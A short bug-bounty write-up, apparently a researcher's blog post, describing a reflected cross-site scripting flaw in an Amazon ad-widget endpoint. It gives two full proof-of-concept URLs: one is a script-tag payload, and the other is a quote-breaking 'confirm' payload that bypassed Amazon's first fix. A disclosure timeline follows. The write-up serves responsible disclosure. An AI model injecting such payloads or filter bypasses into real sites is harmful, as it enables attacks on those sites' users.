Reflected XSS on ws-na.amazon-adsystem.com(Amazon)

This is newp_th. This issue is very similar to my previous report on Reflected XSS on Stack Overflow.

It was much easier than before, Just append a malicious payload “><script/k/>alert(113)</script/k/> to parameter.

https://ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=US&source=ss&ref=as_ss_li_til&ad_type=product_link&tracking_id=jgsbookselection%22%3E%3Cscript/k/%3Ealert(113)%3C/script/k/%3E&marketplace=amazon&region=US&placement=1449319432&asins=1449319432&linkId=cc38d5883c3f92bbeb69b93a6810322a&show_border=true&link_opens_in_new_window=true

Few weeks after reporting this issue to amazon security team, I got a reply that issue has been resolved and to verify it again. On further testing I could easily bypass the fix using payload “-confirm(1)-”.

https://ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=US&source=ss&ref=as_ss_li_til&ad_type=product_link&tracking_id=1%22-confirm(1)-%22&marketplace=amazon&region=US&placement=1449319432&asins=1449319432&linkId=cc38d5883c3f92bbeb69b93a6810322a&show_border=true&link_opens_in_new_window=true#

Thanks for reading. Hope will get time to write some more posts.

Timeline:

29-May-2018: Bug reported

29-May-2018: Bug confirmed by security team

25-June-2018: Bug Fixed

27-June-2018: Bypassed Fix

12-Dec-2018: Bug Resolved